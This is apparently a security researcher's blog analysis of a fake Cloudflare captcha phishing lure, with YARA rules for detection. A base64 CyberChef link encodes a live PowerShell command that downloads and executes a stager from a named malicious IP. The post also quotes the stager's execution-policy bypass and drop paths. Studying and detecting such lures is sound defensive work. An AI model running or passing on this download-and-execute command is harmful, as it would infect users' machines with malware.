☁️Fake CloudFlare Capita

Disclosure: Actual malware, do not play with if you do not know what you're doing. If you get infected it's not my fault.

Yesterday I was putting off some OSEP studying after work and came across this reddit post (since taken down/username removed for privacy). The site the user is talking about has a fake capita CloudFlare page, interesting phishing attack I heard about on a podcast during a roadtrip I was surprised to see an example of still being used. https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Decode_text('UTF-16LE%20(1200)')&input=S0FCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FEb0FMd0F2QURZQU1nQXVBRFlBTUFBdUFESUFNZ0EyQUM0QU1RQTJBRElBTHdBeEFDOEFZd0FuQUNrQUlBQjhBQ0FBU1FCRkFIZ0E&oenc=65001 Above is the decoded CyberChef formula for the payload, let's take a deeper look Stager is downloaded from 62[.]60[.]226[.]162 at the endpoint /1/c. It is still up serving the stager as of the date of publishing this. I am emailing the abuse email for this ip.

Below is a breakdown of each part of this stager

The author of this stager was nice enough to use helpful variables like exePath, thank you buddy

Zip File Path Variable which decodes to "$env + :TEMP\Trop.zip"

Executable File Path Variable which decodes to "%TEMP%\Trop\uwi.exe"

URL For Zip which decodes to "http://62[.]60[.]226[.]162/2/m."

Download of Zip and Extraction of Exe

Powershell function to be run if not Administrator which decodes to "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Start-Process -FilePath "$path""

Privilege Check and Execution

If I had to bet, this code was AI generated, has a number of characteristics I've seen in my work in the space which indicate such (namely variable names and encryption methods).

At the time of publishing this article the endpoint for the exe is down.

Finally I found a any.run analysis of this exe ran around the same time as this post

Malware analysis https://jfbd.com/f/c Malicious activity | ANY.RUN - Malware Sandbox Onlineany.run

The exe was written in golang, this particular example was downloaded from jfbd[.]com (which I also reported). I was unable to get the actual exe for this example, but it seems this malware has been utilized by at least two IPs in a short time frame.

Below are some yara rules to detect the dropping and execution.

rule Cloudflare_Malware_JFBD {
meta:
description = "Detects malware sample associated with fake CloudFlare social engineering technique using jfbd.com as C2"
author = "WhiteHatGinger"
date = "2025-07-24"
reference = "https://any.run/report/0fa1fcfdca31b1ef0c834e96f2b21e27f6cff134148c4e3238891271f8e55486/538de0e3-a6f1-4a77-b09e-c7501d1e67d5"
hash_md5 = "34D15C32D738F1D16DA280A9396D1333"
hash_sha1 = "C60115BA969C71E02F32BB30213B3D86559B4FB1"
hash_sha256 = "0FA1FCFDCA31B1EF0C834E96F2B21E27F6CFF134148C4E3238891271F8E55486"
strings:
$domain = "jfbd.com" ascii nocase
$path = "/f/c" ascii
condition:
uint16(0) == 0x5A4D and // PE file
($domain or $path)
}

rule Cloudflare_Malware_62 {
    meta:
        description = "Detects malware sample associated with fake Cloudflare social engineering technique using IP 62.60.226.162 and endpoints /1/c or /2/m"
        author = "WhiteHatGinger"
        date = "2025-07-24"
    strings:
        $ip = "62.60.226.162" ascii
        $endpoint1 = "/1/c" ascii
        $endpoint2 = "/2/m" ascii
    condition:
        uint16(0) == 0x5A4D and
        ($ip or $endpoint1 or $endpoint2)
}

PreviousThreat Hunting/Investigations

Last updated 5 months ago